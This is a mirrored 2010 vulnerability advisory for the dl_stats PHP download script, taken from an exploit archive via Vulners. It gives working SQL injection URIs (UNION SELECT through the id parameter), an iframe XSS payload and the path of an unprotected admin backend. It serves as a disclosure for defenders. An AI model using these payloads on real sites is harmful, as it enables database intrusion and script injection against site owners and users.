Vulners
Lucene search
DL_Stats Cross Site Scripting / Admin Bypass / SQL Injection
🗓️ 19 Apr 2010 00:00:00Reported by Valentin HoebelType 
packetstorm🔗 packetstormsecurity.com👁 56 Views
`# Exploit Title: dl_stats Multiple Vulnerabilities
# Date: 18.04.2010
# Author: Valentin
# Category: webapps/0day
# Version:
# Tested on:
# CVE :
# Code :
[:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]
|:: >> General Information
|:: Advisory/Exploit Title = dl_stats Multiple Vulnerabilities
|:: Author = Valentin Hoebel
|:: Contact = [email protected]
|::
|::
[:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]
|:: >> Product information
|:: Name = dl_stats
|:: Vendor = Claus van Beek
|:: Vendor Website = http://clausvb.de/
|:: Affected Version(s) = please view vulnerability details
|::
|::
[:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]
|:: >> #1 Vulnerability
|:: Type = SQL Injection
|:: Affected Versions = < 2.0
|:: Vulnerable File(s) = multiple files
|:: Vulnerable Parameter(s) = multiple parameters
|:: #1 Example URI = view_file.php?id=6+AND+1=2+UNION+SELECT+1,concat(user()),concat(user()),concat(user()),concat(user()),6,7,concat(user())--
|:: #2 Example URI = download.php?id=2+AND+1=2+UNION+SELECT+1,concat(user()),3,concat(user()),concat(user())--
|::
|:: >> #2 "Vulnerability"
|:: Type = Unprotected Admin Backend
|:: Affected Versions = all
|:: URI = admin/index.htm
|:: This is not a real vulnerability. The admin backend simply isn't protected
|:: by any login, the installation manual recommends to protect it with a
|:: .htaccess file. Many webmasters just forget to do so.
|::
|:: >> #3 Vulnerability
|:: Type = XSS
|:: Affected Versions = < 2.0
|:: Vulnerable File(s) = multiple files
|:: Vulnerable Parameter(s) = multiple parameters
|:: Example URI = download_proc.php?id=<iframe src=http://www.google.de>
|::
|::
[:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]
|:: >> Additional Information
|:: Advisory/Exploit Published = 18.04.2010
|:: The vendor seems to have rewritten the dl_stats software. Since version 2.0
|:: it validates the user input. The vendor only offers the latest version for download.
|:: If you want to test around a little bit you maybe are lucky and find an old
|:: version to download somewhere.
|:: Although version 2.0 was released a long time ago, many websites still use the
|:: old versions for their websites.
|::
|::
[:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]
|:: >> Misc
|:: Greetz && Thanks = inj3ct0r team, Exploit DB, hack0wn and ExpBase!
|::
|::
[:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Apr 2010 00:00Current
0.3Low risk
Vulners AI Score0.3